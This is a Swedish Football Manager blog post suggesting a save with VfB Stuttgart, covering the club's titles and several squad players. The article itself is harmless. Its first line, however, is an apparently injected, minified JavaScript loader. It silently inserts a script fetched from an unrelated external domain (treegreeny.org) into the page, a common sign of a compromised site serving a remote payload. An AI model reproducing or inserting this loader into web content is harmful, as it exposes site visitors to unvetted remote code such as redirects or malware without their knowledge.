;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tysk-tisdag – “Die Jungen Wilden” – FMSweden
Meny Stäng

Tysk-tisdag – “Die Jungen Wilden”

Keven Tysk-tisdag

Jag har tidigare skrivit om att starta en save med storklubben Schalke 04 – en klubb som har en enorm potential, men som aldrig riktigt har lyckats förvalta den.

 

Denna vecka tänkte jag skriva om en annan anrik klubb som har plockat fram flera tyska landslagsstjärnor – VFB Stuttgart.
Jag tänkte att det var passande då både Serge Gnabry och Joshua Kimmich lyfte CL-pokalen när Bayern München vann mot PSG i söndags. Två spelare som ursprungligen kommer från Stuttgarts fina akademi.

 

Ser man till lagets prestationer under 10-talet har det inte varit särskilt bra. Som bäst slutade VFB sexa säsongerna 09/10 och 11/12. Dessutom har laget varit två vändor i 2.Bundesliga, men båda gångerna studsade man direkt tillbaka till Bundesliga.

 

Ser vi till ligatitlar så har klubben sammanlagt 5 stycken. Senast vann Stuttgart säsongen 06/07. Stuttgart är faktiskt en av fem lag som har vunnit Bundesliga mellan säsongerna 99/00 till 19/20:

  • Bayern München (15 titlar)
  • Dortmund (3 titlar)
  • Wolfsburg (1 titel)
  • Werder Bremen (1 titel)
  • VFB Stuttgart (1 titel)

När vi kikar på nuvarande spelartrupp finns det ett par spelare som jag tycker att man bör kika närmare på:

Clinton Mola – engelsmannen gick från Chelseas U23 till VFB Stuttgart i vintras och besitter en fin mångsidighet. Kan både användas som mittfältare och försvarare.

 

I mittfältet hittar vi bland annat Orel Mangala. En stabil och hårt jobbande mittfältaren.

 

30-åriga mittfältaren Daniel Didavi som har varit en viktig kugge för laget (när han inte har varit skadad).

 

Inför säsongen 20/21 har Stuttgart lånat in försvararen Konstantinos Mavropanos. 22-åringen har bara ett fåtal insatser i Arsenals A-lag och förra säsongen var han utlånad till 2.BL-laget Nürnberg.

 

Från den egna akademin hittar vi mittfältaren Lilian Egloff (18) som ses som en framtida ledare.

 

Det är ingen lätt uppgift – sportchefen Sven Mislintat har sagt att målet kommande säsong är att hålla sig kvar i Bundesliga. Testa om du kan lyckas bättre. Historiken finns i alla fall i vägarna sett till Bundesligas “All Time-tabell”.

Please wait...

Liknande Inlägg

4 kommentarer

  1. Pingback: Bundesliga är tillbaka! – FMSweden

Lämna ett svar